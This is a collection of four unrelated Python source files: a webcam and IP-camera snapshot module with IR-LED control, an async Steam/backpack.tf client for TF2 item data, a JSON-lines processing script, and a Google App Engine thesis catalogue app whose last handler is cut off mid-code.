# Copyright (c) 2015 Corrado Ubezio
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Capturing a single image from webcam
In Linux there are the following methods:
METHOD 1: RTSP protocol
avconv -i rtsp://<user>:<pass>@<local_ip>:<port>/video.mjpg -vframes 1 -r 1 -s 640x480 image.jpg
METHOD 2: HTTP protocol
avconv -i http://<user>:<pass>@<local_ip>:<port>/video.mjpg -vframes 1 -r 1 -s 640x480 image.jpg
METHOD 3: If the camera is smart enough, it is possible to send an http request to take a snapshot
wget --tries=2 --timeout=10 http://<user>:<pass>@<local_ip>:<port>/cgi-bin/jpg/image -O snapshot.jpg
See also: Link: http://stackoverflow.com/a/11094891
"""
from __future__ import print_function
from requests import get, post
from time import sleep
from sys import stderr
'''In dark image detection, compare 'light' pixels with 'dark' ones.'''
LIGHT_THRESHOLD_DEFAULT = -1
def cv2_gshistogram(imageAsByteArray):
'''Use OpenCV tp convert the bytearray image buffer to grayscale and
returns the histogram as a list of pixel counts,
one for each pixel value in the source image.
Since the source image has been converted to one only band (grayscale),
there are 256 pixel counts, that is an index for each shade of grey.
'''
from cv2 import calcHist, imdecode, IMREAD_GRAYSCALE
from numpy import frombuffer, uint8
img = frombuffer(imageAsByteArray, dtype=uint8)
grayimg = imdecode(img, IMREAD_GRAYSCALE)
return calcHist([grayimg],[0],None,[256],[0,256])
def pil_gshistogram(imageAsByteArray):
'''Use Pillow tp convert the bytearray image buffer to grayscale and
returns the histogram as a list of pixel counts,
one for each pixel value in the source image.
Since the source image has been converted to one only band (grayscale),
there are 256 pixel counts, that is an index for each shade of grey.
'''
from PIL import Image
import StringIO
# Convert the bytes object containing a jpeg image to Pillow
# see: https://stackoverflow.com/a/24997383
img = Image.open(StringIO.StringIO(imageAsByteArray))
# Convert to greyscale and return the pixel counts list
grayimg = img.convert(mode='L')
return grayimg.histogram()
def isDarkImage(imageAsBytearray, lightThreshold=LIGHT_THRESHOLD_DEFAULT):
'''Return True if in the grayscale histogram of the image there are
less 'light' pixels than 'dark' ones.
If lightThreshold is supplied then 'light' pixels are compared with it.
# In a grayscale histogram, the first 128 values are 'dark',
# the last 128 are 'light' pixels.
See: https://stackoverflow.com/a/8659785
'''
pixel_counts = pil_gshistogram(imageAsBytearray)
indexes = len(pixel_counts) # should be 256 (an index for each shade of grey)
light_pixels = sum(pixel_counts[indexes/2:])
if lightThreshold <= LIGHT_THRESHOLD_DEFAULT:
lightThreshold = sum(pixel_counts[:indexes/2]) # dark pixels
if light_pixels <= lightThreshold:
return True
return False
def lightsIP(cameraUrl, username, password, switchOn):
'''Switch IR leds on/off
See night vision mode on/off for D-Link DCS-932L IP Camera
link: http://forums.ispyconnect.com/forum.aspx?g=posts&t=1151
Returns bool
'''
if switchOn is True:
payload = {"IRLed":"1"}
else:
payload = {"IRLed":"0"}
try:
r = post(cameraUrl, auth=(username, password), data=payload)
except Exception:
# TODO: better to handle exceptions as in:
# http://docs.python-requests.org/en/latest/user/quickstart/#errors-and-exceptions
return False
if r.status_code == 204:
'''The server has successfully fulfilled the request
and there is no additional content.
'''
return True
return False
def grabImageFromIP(cameraUrl, username, password):
'''Grabs a snapshot from the IP camera referenced by its URL.
See: http://stackoverflow.com/a/13137873
Returns bool, JPEG bytearray.
'''
try:
r = get(cameraUrl, auth=(username, password), timeout=10, stream=True)
except Exception:
# TODO: better to handle exceptions as in:
# http://docs.python-requests.org/en/latest/user/quickstart/#errors-and-exceptions
return False, None
if r.status_code != 200:
return False, None
jpgImage = b""
for chunk in r.iter_content(1024):
jpgImage = jpgImage + chunk
if len(jpgImage) == 0:
return False, None
return True, jpgImage
def grabImageFromUSB(cameraNumber=0):
'''Grabs a snapshot from the specified USB camera.
Returns bool, video frame decoded as a JPEG bytearray.
'''
from cv2 import VideoCapture, imencode
# initialize the camera
cam = VideoCapture(cameraNumber)
retVal, rawData = cam.read()
if not retVal:
# frame captured returns errors
return False, None
retVal, jpgData = imencode('.jpg', rawData)
if not retVal:
# image encode errors
return False, None
return retVal, bytearray(jpgData)
def grabImage(cameraDesc):
'''Wraps grabImageFromIP and grabImageFromUSB
The camera type (usb or ip) is get from the descriptor.
Returns bool, JPEG bytearray.
'''
retval = False
jpgImage = b""
camProtAndAddr = cameraDesc['source'].split('://')
if camProtAndAddr[0] == 'usb':
retval, jpgImage = grabImageFromUSB(eval(camProtAndAddr[1]))
elif camProtAndAddr[0] == 'http':
retval, jpgImage = grabImageFromIP(cameraDesc['source'],
cameraDesc['optional-auth']['user-name'],
cameraDesc['optional-auth']['password'])
return retval, jpgImage
def imageCapture(cameraDesc, imageFileName):
'''Saves a snapshot from a camera to the specified file.
If camera has night vision capability, use IrLeds; and if threshold is given
first take am image with night vision off and if it is too dark compared
to the threshold then shot again with IrLeds ON.
The camera type (usb or ip) is get from the descriptor:
cameraDesc = {
"optional-irled": {
"url-ctrl" : "<camera_irled_ctrl_protocol_and_address>",
"opt-light-threshold" : "<threshold_light_pixels>"
},
"optional-auth": {
"user-name" : "<camera_user>",
"password": "<camera_user_password>"
},
"source": "<camera_protocol_and_address>"
}
Returns bool
'''
applyNightVision = False
# Check night vision capability
try:
irLed_ctrl_url = cameraDesc['optional-irled']['url-ctrl']
except KeyError:
irLed_ctrl_url = None
if irLed_ctrl_url:
# the camera has night vision capability:
applyNightVision = True
try:
username = cameraDesc['optional-auth']['user-name']
password = cameraDesc['optional-auth']['password']
except KeyError:
username = ''
password = ''
# check threshold capability
try:
threshold = cameraDesc['optional-irled']['opt-light-threshold']
except KeyError:
threshold = None
if threshold:
try:
threshold = int(threshold)
except ValueError:
threshold = LIGHT_THRESHOLD_DEFAULT
if threshold:
# first take am image with night vision off
grabOk, jpgImage = grabImage(cameraDesc)
if not grabOk:
# grabImage returns errors
return False
# and then compare with threshold
if isDarkImage(jpgImage, threshold):
applyNightVision = True
print('Recover a Dark Image', file=stderr)
else:
applyNightVision = False
# switch IrLeds ON
if applyNightVision:
irLedOk = lightsIP(irLed_ctrl_url, username, password, True)
if irLedOk is False:
# TODO check the result
print('FAIL to switch IrLeds ON', file=stderr)
else:
# wait for IrLeds settling
sleep(4)
# take the image
grabOk, jpgImage = grabImage(cameraDesc)
# switch IrLeds OFF
if applyNightVision:
irLedOk = lightsIP(irLed_ctrl_url, username, password, False)
if irLedOk is False:
# TODO check the result
print('FAIL to switch IrLeds OFF', file=stderr)
if not grabOk:
# grabImage returns errors
return False
# save the image
retVal = True
try:
with open(imageFileName, 'wb') as f:
f.write(jpgImage)
except IOError:
retVal = False
return retVal
if __name__ == "__main__":
pass
|
|
"""This module is based on the Steam WebAPI and can be used to get information
about items in TF2. Using this module, you can obtain the item schema,
store prices, bundles, item sets and attributes for TF2.
You can also obtain market prices from backpack.tf.
There are also functions for parsing the information of each item.
"""
import asyncio
import json
from collections import defaultdict, OrderedDict
import aiohttp
async def getschema(apikey):
"""Return the schema"""
schema_task = asyncio.ensure_future(_getschemaoverview(apikey))
all_items = []
start = 0
while start is not None:
items, start = await _getschemaitems(apikey, start)
all_items.extend(items)
schema = await schema_task
schema['result']['items'] = all_items
return schema
async def _getschemaoverview(apikey):
url = ('https://api.steampowered.com/IEconItems_440/GetSchemaOverview/v1/'
f'?key={apikey}&language=en')
return await _getjsonresponse(url)
async def _getschemaitems(apikey, start):
url = ('https://api.steampowered.com/IEconItems_440/GetSchemaItems/v1/'
f'?key={apikey}&language=en&start={start}')
result = (await _getjsonresponse(url))['result']
return result['items'], result.get('next')
async def getitemsinfo(apikey, storeprices, indexes):
"""Return a dictionary of AssetClassInfo values with defindex as key"""
url = ('https://api.steampowered.com/ISteamEconomy/GetAssetClassInfo/v0001/'
'?key={0}&language=en&appid=440&class_count={1}'.format(apikey,
len(indexes)
))
for n, index in enumerate(indexes):
classid = storeprices[index]['classid']
url += '&classid{0}={1}'.format(n, classid)
infobyid = (await _getjsonresponse(url))['result']
del infobyid['success']
return {int(iteminfo['app_data']['def_index']): iteminfo
for iteminfo in infobyid.values()}
async def getbundles(apikey, storeprices):
"""Return a dictionary of store bundles with defindex as key"""
indexes = [index for index, price in storeprices.items()
if not {'Bundles', 'Class_Bundles'}.isdisjoint(price['tags'])]
return await getitemsinfo(apikey, storeprices, indexes)
def getitemsets(schema):
"""Return an ordered dictionary of itemsets with 'name' as key"""
return OrderedDict([(itemset['name'], itemset) for itemset in
schema['result']['item_sets']])
def getitems(schema):
"""Return an ordered dictionary of items in the schema where the key is
defindex for each item"""
return OrderedDict([(item['defindex'], item) for item in
schema['result']['items']])
def getitemsbyname(schema):
"""Return an ordered dictionary of items in the schema where the key is
item_name for each item"""
itemsbyname = OrderedDict()
duplicates = getobsoleteindexes()
for item in schema['result']['items']:
name = item['item_name']
if name not in itemsbyname:
if item['defindex'] not in duplicates:
itemsbyname[name] = item
return itemsbyname
def getattributes(schema):
"""Return a dictionary with each attribute's name as key"""
return {attribute['name']: attribute for attribute in
schema['result']['attributes']}
def getparticleeffects(schema):
"""Return a dictionary with each particle effect's id as key"""
return {effect['id']: effect for effect in
schema['result']['attribute_controlled_attached_particles']}
async def getstoreprices(apikey):
"""Return a dictionary of store prices where the key is defindex for
each item"""
url = ('https://api.steampowered.com/ISteamEconomy/GetAssetPrices/v0001/'
'?key={}&language=en&appid=440¤cy=usd'.format(apikey))
prices = (await _getjsonresponse(url))['result']['assets']
return {int(price['name']): price for price in prices}
def getnewstoreprices(storeprices):
"""Return a dictionary of store prices of new items with defindex as key"""
return {index: price for index, price in storeprices.items()
if 'New' in price['tags']}
async def getbackpackprices(apikey, items, itemsbyname):
"""Get market prices from backpack.tf.
Return a dictionary where the key is defindex and value is a dictionary of
prices for the item"""
url = ('https://backpack.tf/api/IGetPrices/v4/'
'?key={}&compress=1'.format(apikey))
pricesdata = (await _getjsonresponse(url))['response']['items']
pricesdict = defaultdict(dict)
qualities = getallqualities()
denoms = {'metal': 'Refined', 'hat': 'Hat', 'keys': 'Key', 'usd': 'USD'}
for name, iteminfo in pricesdata.items():
if name not in itemsbyname:
continue
index = itemsbyname[name]['defindex']
item = items[index]
iscrate = False
if 'attributes' in item and item['attributes']:
attribute = item['attributes'][0]
if attribute['name'] == 'set supply crate series':
iscrate = True
crateno = str(attribute['value'])
if 'prices' not in iteminfo:
continue
for quality, tradeinfo in iteminfo['prices'].items():
try:
qualityname = qualities[int(quality)]
except KeyError:
continue
for tradable, craftinfo in tradeinfo.items():
# Ignore non-tradable version if there is a tradable one
if tradable == 'Non-Tradable' and 'Tradable' in tradeinfo:
continue
for craftable, price in craftinfo.items():
if type(price) is list:
price = price[0]
else:
if iscrate and crateno in price:
price = price[crateno]
elif '0' in price:
price = price['0']
else:
continue
if not price['value']:
continue
value = price['value']
valuehigh = (' - {:g}'.format(price['value_high'])
if 'value_high' in price else '')
denom = denoms[price['currency']]
if (value != 1 or valuehigh) and denom not in ('Refined',
'USD'):
denom += 's'
qlty = (qualityname if craftable != 'Non-Craftable'
else 'Uncraftable')
pricesdict[index][qlty] = '{:g}{} {}'.format(
value, valuehigh, denom)
return pricesdict
def getweapontags():
"""Return all weapon tags"""
return ('primary', 'secondary', 'melee', 'pda', 'pda2', 'building')
def getalltags():
"""Return all item tags"""
return (('weapon', 'cosmetic', 'hat', 'misc', 'taunt', 'tool', 'action',
'paint', 'craft', 'token', 'bundle', 'tournament', 'halloween') +
getweapontags())
def getallclasses():
"""Return an OrderedDict of TF2 classes with name as key and
a list of aliases as value"""
return OrderedDict([('Scout', ['Scoot']),
('Soldier', ['Solly']),
('Pyro', []),
('Demoman', ['Demo']),
('Heavy', ['Hoovy']),
('Engineer', ['Engi', 'Engie']),
('Medic', []),
('Sniper', []),
('Spy', [])])
def getallqualities():
"""Return a dictionary of TF2 item qualities with number as key and
description as value"""
return {6: 'Unique',
3: 'Vintage',
11: 'Strange',
1: 'Genuine',
14: "Collector's",
13: 'Haunted',
5: 'Unusual'}
def getalldenoms():
"""Return an OrderedDict of price denominations in descending order with
the defindex of their corresponding items as value"""
return OrderedDict([('Key', 5021),
('Refined', 5002),
('Reclaimed', 5001),
('Scrap', 5000),
('Weapon', 0)])
def getstoreprice(item, storeprices):
"""Get store price of item"""
index = item['defindex']
return ('{:.2f}'.format(storeprices[index]['prices']['USD'] / 100.00)
if index in storeprices else '')
def getmarketprice(item, marketprices):
"""Get market price of item"""
index = item['defindex']
return marketprices[index] if index in marketprices else {}
def getitemattributes(item, allattributes, effects):
"""Get attributes of item"""
attributelist = []
if 'attributes' in item:
attributes = item['attributes']
for a in attributes:
value = a['value']
attribute = allattributes[a['name']]
if not attribute['hidden'] and 'description_string' in attribute:
description = attribute['description_string']
descformat = attribute['description_format']
if descformat == 'value_is_particle_index':
value = effects[value]['name']
description = description.replace('%s1', '{}')
else:
if descformat == 'value_is_percentage':
value = (value * 100) - 100
elif descformat == 'value_is_inverted_percentage':
value = 100 - (value * 100)
elif descformat == 'value_is_additive_percentage':
value *= 100
description = description.replace('%s1', '{:g}')
description = description.format(value)
attrdict = {'description': description,
'type': attribute['effect_type']}
if attrdict['type'] == 'unusual':
attrdict['type'] = 'neutral'
attributelist.append(attrdict)
order = ('neutral', 'positive', 'negative')
return sorted(attributelist, key=lambda k: order.index(k['type']))
def getitemclasses(item):
"""Get the TF2 classes that can use this item"""
return (sorted(item['used_by_classes'],
key=list(getallclasses().keys()).index)
if 'used_by_classes' in item else [])
def getitemtags(item):
"""Get a list of tags that describe the item"""
tags = []
itemclass = item['item_class']
itemtypename = item['item_type_name']
if itemclass == 'bundle':
tags.append(itemclass)
elif itemclass == 'craft_item':
tags.append('craft')
elif itemclass.endswith('_token'):
tags.append('token')
if 'item_slot' in item:
slot = item['item_slot']
if slot in getweapontags() and itemclass != 'slot_token':
tags.append('weapon')
if slot == 'misc':
tags.append('cosmetic')
if itemtypename in ('#TF_Wearable_Hat', 'Hat', 'Mask',
'Holiday Hat', 'Headset', 'Hair'):
tags.append('hat')
else:
tags.append(slot)
if itemtypename == 'Tournament Medal':
tags.append('tournament')
if 'tool' in item:
tags.append('tool')
if item['tool']['type'] == 'paint_can':
tags.append('paint')
if item.get('holiday_restriction') == 'halloween_or_fullmoon':
tags.append('halloween')
return tags
def getobsoleteindexes():
"""Return the indexes of obsolete items that have newer versions"""
map_stamps = {
2007, 2015, 2049, 2079, 2123, 2125, 2138, 2139, 2140, 2143, 2155, 2156
}
starter_packs = set(range(2018, 2027)) | set(range(2094, 2103))
return {699, 2093} | map_stamps | starter_packs
async def getplayerbackpack(apikey, steamid):
"""Return the player backpack of the given steamid"""
url = ('https://api.steampowered.com/IEconItems_440/GetPlayerItems/v0001/'
f'?key={apikey}&steamid={steamid}')
return (await _getjsonresponse(url)).get('result')
async def getplayersummary(apikey, steamid):
"""Return the player summary of the given steamid"""
return (await getplayersummaries(apikey, [steamid]))[0]
async def getplayersummaries(apikey, steamids):
"""Return the player summaries of a list of steamids"""
url = ('https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/'
f"?key={apikey}&steamids={','.join(steamids)}")
return (await _getjsonresponse(url))['response']['players']
async def resolvevanityurl(apikey, vanityurl):
"""Return the steamid of a given vanity url"""
url = ('https://api.steampowered.com/ISteamUser/ResolveVanityURL/v0001/'
f'?key={apikey}&vanityurl={vanityurl}')
response = (await _getjsonresponse(url))['response']
if response['success'] == 1:
return response['steamid']
async def _getjsonresponse(url):
headers = {'User-Agent': 'tf2api'}
async with aiohttp.ClientSession(headers=headers) as session:
async with session.get(url) as response:
return json.loads((await response.read()).decode())
|
|
#coding=utf-8
#2014.12.13
#author@shibin
import json
#import datetime
import sys
def get_part_info(input_fname,output_fname):
def part_info(line_data):
#-----------------------
uin=json.loads(line_data).get('uin')
if uin!=None:uin=str(uin)
return uin
#-----------------------
'''
data_list=line_data.strip().split('\t')
***=data_list[4][:-4]
return data_list[1]+"\t"+***
'''
input_f=open(input_fname,"r")
output=open(output_fname,"w")
part_dict={}
for line in input_f:
if line=="\n":
continue
if line=="":
break
part=part_info(line)
if part==None:
continue
#if part_dict.has_key(part):
continue
output.write(part.strip())
output.write('\n')
#part_dict[part]=1
input_f.close()
output.close()
def filter_err_line(input_fname,output_fname,err_output=None):
input_f=open(input_fname,"r+")
output=open(output_fname,"w+")
if err_output!=None:
err=open(err_output,'w+')
for line in input_f:
if line=="\n":
continue
if line=="":
break
try:
#---------------------------------------------------
#json_line=line.strip().split('\t')[1]
#if json.loads(json_line).get("***")==None:
# if err_output!=None:
# wrr.write(line)
# continue
#output.write(line)
load_data=json.loads(line)
#if not load_data.has_key("error_id"):
output.write(line)
except:
if err_output!=None:
err.write(line)
input_f.close()
output.close()
if err_output!=None:
err.close()
def together_id(input_fname,output_fname):
def get_decode_data(line):
#return json.loads(line)
return line.strip().split('\t')
def get_id_part(doc):
return doc[0]
def get_compare_part(doc):
return int(doc[1])
#return datetime.datetime.strptime(time_str,'%Y-%m-%dT%H:%M:%S')
def compare_change(this_flag,old_flag):
if this_flag>=old_flag:
return True
return None
id_compare_dict={}
input_f=open(input_fname,"r+")
line_count=0
for line in input_f:
if line=="\n":
continue
if line=="":
break
line_count+=1
this_doc=get_decode_data(line)
this_id=get_id_part(this_doc)
this_flag=get_compare_part(this_doc)
if not id_compare_dict.has_key(this_id):
id_compare_dict[this_id]=(this_flag,line_count)
continue
old_flag=id_compare_dict[this_id][0]
if compare_change(this_flag,old_flag)==True:
id_compare_dict[this_id]=(this_flag,line_count)
input_f.close()
print len(id_compare_dict.keys()),line_count
lines={}
for ki in id_compare_dict:
lines[id_compare_dict[ki][1]]=1
input_f=open(input_fname,"r")
output=open(output_fname,"w")
line_count=0
for line in input_f:
if line=="\n":
continue
if line=="":
break
line_count+=1
if lines.has_key(line_count):
output.write(line)
input_f.close()
output.close()
#
def combine_data(input_fname,add_fname,output_fname):
def get_input_doc(input_line):
#
line_list=input_line.split('\t',1)
item_id=line_list[0]
json_line=line_list[1]
doc=json.loads(json_line)
input_doc={}
input_doc['id']=item_id
input_doc['data']=doc
return input_doc
def get_add_doc(add_line):
doc=json.loads(add_line)
add_doc={}
add_doc['id']=doc['item_id']
add_doc['data']=(doc['***'],doc['***'])
return add_doc
def make_id_output(input_doc,add_doc):
item_id=input_doc['id']
doc=input_doc['data']
doc['***']=add_doc[1]
return item_id+'\t'+json.dumps(doc,ensure_ascii=False).encode('utf-8')
combine_by_id=True
if combine_by_id:
id_add={}
add_f=open(add_fname,'r')
for line in add_f:
if line=="\n":
continue
if line=="":
break
add_doc=get_add_doc(line)
if add_doc==None:
continue
id_add[add_doc['id']]=add_doc['data']
add_f.close()
input_f=open(input_fname,'r')
output=open(output_fname,'w')
for line in input_f:
if line=="\n":
continue
if line=="":
break
input_doc=get_input_doc(line)
if input_doc==None:
continue
add_doc=id_add.get(input_doc['id'])
if add_doc==None:
pass
continue
new_line=make_id_output(input_doc,add_doc)
output.write(new_line)
output.write('\n')
input_f.close()
output.close()
if __name__ == '__main__':
if sys.argv[1]=="-part":
input_fname=sys.argv[2]
output_fname=sys.argv[3]
get_part_info(input_fname,output_fname)
if sys.argv[1]=="-tgid":
input_fname=sys.argv[2]
output_fname=sys.argv[3]
together_id(input_fname,output_fname)
if sys.argv[1]=="-ferr":
input_fname=sys.argv[2]
output_fname=sys.argv[3]
err=None
if len(sys.argv)==5:
err=sys.argv[4]
filter_err_line(input_fname,output_fname,err_output=err)
if sys.argv[1]=="-comb":
input_fname=sys.argv[2]
add_fname = sys.argv[3]
output_fname=sys.argv[4]
combine_data(input_fname,add_fname,output_fname)
|
|
import webapp2
from google.appengine.api import users
from google.appengine.ext import ndb
import jinja2
import os
import logging
import json
import csv
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
class thesisentry(ndb.Model):
thesis_year = ndb.StringProperty()
thesis_title = ndb.StringProperty(indexed=True)
thesis_abstract = ndb.TextProperty()
thesis_adviser = ndb.KeyProperty(kind='Faculty',indexed=True)
thesis_section = ndb.StringProperty()
thesis_department = ndb.KeyProperty(kind='Department',indexed=True)
thesis_proponent = ndb.KeyProperty(kind='Student', repeated=True)
thesis_tags = ndb.StringProperty(repeated=True)
thesis_author = ndb.KeyProperty(indexed=True)
date = ndb.DateTimeProperty(auto_now_add=True)
@classmethod
def get_by_name(model, name):
try:
student = model.query(model.thesis_title == name)
return student.get()
except Exception:
return None
class User(ndb.Model):
email = ndb.StringProperty(indexed=True)
first_name = ndb.StringProperty()
last_name = ndb.StringProperty()
phone_number = ndb.IntegerProperty()
is_admin = ndb.BooleanProperty()
created_date = ndb.DateTimeProperty(auto_now_add=True)
class Faculty(ndb.Model):
faculty_title = ndb.StringProperty(indexed=True)
faculty_fname = ndb.StringProperty(indexed=True)
faculty_sname = ndb.StringProperty(indexed=True)
faculty_full = ndb.StringProperty(indexed=True)
faculty_email = ndb.StringProperty(indexed=True)
faculty_phone = ndb.StringProperty(indexed=True)
faculty_bday = ndb.StringProperty(indexed=True)
faculty_department = ndb.KeyProperty(kind='Department', indexed=True)
created_date = ndb.DateTimeProperty(auto_now_add=True)
@classmethod
def get_by_name(model, name):
try:
adviser = model.query(model.faculty_full == name)
return adviser.get()
except Exception:
return None
@classmethod
def get_by_keyname(model, key):
try:
return model.get_by_id(key)
except Exception:
return None
class Student(ndb.Model):
student_fname = ndb.StringProperty(indexed=True)
student_sname = ndb.StringProperty(indexed=True)
student_full = ndb.StringProperty(indexed=True)
student_email = ndb.StringProperty(indexed=True)
student_phone = ndb.StringProperty(indexed=True)
student_number = ndb.StringProperty(indexed=True)
student_graduated = ndb.IntegerProperty(indexed=True)
student_bday = ndb.StringProperty(indexed=True)
student_department = ndb.KeyProperty(kind='Department', indexed=True)
student_name_portions = ndb.StringProperty(repeated=True)
created_date = ndb.DateTimeProperty(auto_now_add=True)
@classmethod
def get_by_name(model, name):
try:
student = model.query(model.student_full == name)
return student.get()
except Exception:
return None
class University(ndb.Model):
university_name = ndb.StringProperty(indexed=True)
university_initial = ndb.StringProperty(indexed=True)
university_address = ndb.StringProperty(indexed=True)
created_date = ndb.DateTimeProperty(auto_now_add=True)
class Department(ndb.Model):
department_college = ndb.KeyProperty(kind='College', indexed=True)
department_name = ndb.StringProperty(indexed=True)
department_chair = ndb.KeyProperty(kind='Faculty',indexed=True)
created_date = ndb.DateTimeProperty(auto_now_add=True)
@classmethod
def get_by_name(model, name):
try:
department = model.query(model.department_name == name)
return department.get()
except Exception:
return None
class College(ndb.Model):
college_university = ndb.KeyProperty(kind='University',indexed=True)
college_name = ndb.StringProperty(indexed=True)
college_departments = ndb.KeyProperty(repeated=True)
created_date = ndb.DateTimeProperty(auto_now_add=True)
class MainPageHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/main.html')
self.response.write(template.render(template_values))
else:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list'}
links['Students'] = {'List':'/student/list'}
links['Universities'] = {'List':'/university/list'}
links['Colleges'] = {'List':'/college/list'}
links['Departments'] = {'List':'/department/list'}
links['Theses'] = {'List':'/thesis/list/all'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/main.html')
self.response.write(template.render(template_values))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
class APIHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
thesisdet = thesisentry.query().order(-thesisentry.date).fetch()
thesis_list = []
for thesis in thesisdet:
# user = User.query(User.key == thesis.thesis_author)
e = []
# for u in user:
# e.append({
# 'first_name':u.first_name,
# 'last_name':u.last_name
# })
departmentlist = Department.query(Department.key == thesis.thesis_department)
d = []
for de in departmentlist:
college = de.department_college.get()
university = college.college_university.get()
d.append({
'name':de.department_name,
'college': college.college_name,
'university': university.university_name,
'university_id':university.key.id()
})
facultylist = Faculty.query(Faculty.key == thesis.thesis_adviser)
f = []
for fa in facultylist:
f.append({
'name':fa.faculty_full,
'faculty_id':fa.key.id()
})
thesis_list.append({
'id' : thesis.key.id(),
'year': thesis.thesis_year,
'title': thesis.thesis_title,
'abstract': thesis.thesis_abstract,
'adviser': f,
'section': thesis.thesis_section,
'department': d,
'thesis_id': thesis.key.id()
})
response = {
'result' : 'OK',
'thesis_data' : thesis_list
}
self.response.headers['Content-Type'] = 'application.json'
self.response.out.write(json.dumps(response))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
def post(self):
thesis = thesisentry()
user = User()
faculty = Faculty()
loggedin_user = users.get_current_user()
user_key = ndb.Key('User', loggedin_user.user_id())
thesis_proponents = []
i = 0
while self.request.get('thesis_proponent_' + str(i)) is not None and self.request.get('thesis_proponent_' + str(i)) != '':
thesis_proponent_temp = Student.query(Student.student_full == self.request.get('thesis_proponent_' + str(i)))
if thesis_proponent_temp.count():
thesis_proponent_temp = thesis_proponent_temp.get()
thesis_proponents.append(thesis_proponent_temp.key)
else:
thesis_proponent_temp = Faculty.query(Faculty.faculty_full == self.request.get('thesis_proponent_' + str(i)))
if thesis_proponent_temp.count():
thesis_proponent_temp = thesis_proponent_temp.get()
thesis_proponents.append(thesis_proponent_temp.key)
else:
thesis_proponents.append(None)
i += 1
logging.info(thesis_proponents)
thesis_adviser_temp = Faculty.query(Faculty.faculty_full == self.request.get('thesis_adviser'))
thesis_adviser_temp = thesis_adviser_temp.get()
thesis_adviser_key = thesis_adviser_temp.key
thesis_department_temp = Department.query(Department.department_name == self.request.get('thesis_department'))
thesis_department_temp = thesis_department_temp.get()
thesis_department_key = thesis_department_temp.key
thesis.thesis_author = user_key
thesis.thesis_year = self.request.get('thesis_year')
thesis.thesis_title = self.request.get('thesis_title')
thesis.thesis_abstract = self.request.get('thesis_abstract')
thesis.thesis_adviser = ndb.Key('Faculty', thesis_adviser_key.id())
thesis.thesis_section = self.request.get('thesis_section')
thesis.thesis_proponent = thesis_proponents
thesis.thesis_department = ndb.Key('Department', thesis_department_key.id())
tags = []
for t in thesis.thesis_title.split():
if len(t) >= 3 and t not in tags:
tags.append(t)
thesis.thesis_tags = tags
thesis.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result': 'OK',
'data': {
'id' : thesis.key.urlsafe(),
'year': thesis.thesis_year,
'title': thesis.thesis_title,
'abstract': thesis.thesis_abstract,
'section': thesis.thesis_section,
'author': user_key.get() + ' ' + user_key.get().last_name
}
}
self.response.out.write(json.dumps(response))
class LoginHandler(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
if user:
user_key = ndb.Key('User', user.user_id())
user_info = user_key.get()
if user_info:
self.redirect('/home')
else:
self.redirect('/register')
class RegistrationHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
check = Faculty.query(Faculty.faculty_email == loggedin_user.email())
check = check.get()
logging.info(check)
if check is not None:
user = User(is_admin=True,first_name=check.faculty_fname,last_name=check.faculty_sname,email=check.faculty_email,id=loggedin_user.user_id())
user.put()
self.redirect('/home')
if user:
self.redirect('/home')
else:
template_data = {
'email':loggedin_user.email()
}
template = JINJA_ENVIRONMENT.get_template('/pages/register.html')
self.response.write(template.render(template_data))
else:
self.redirect(users.create_login_url('/register'))
def post(self):
user = User(id=users.get_current_user().user_id())
user.phone_number = int(self.request.get('phone_number'))
user.email = self.request.get('email')
user.first_name = self.request.get('first_name')
user.last_name = self.request.get('last_name')
user.is_admin = False
user.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'first_name':user.first_name,
'last_name':user.last_name,
'phone_number':user.phone_number,
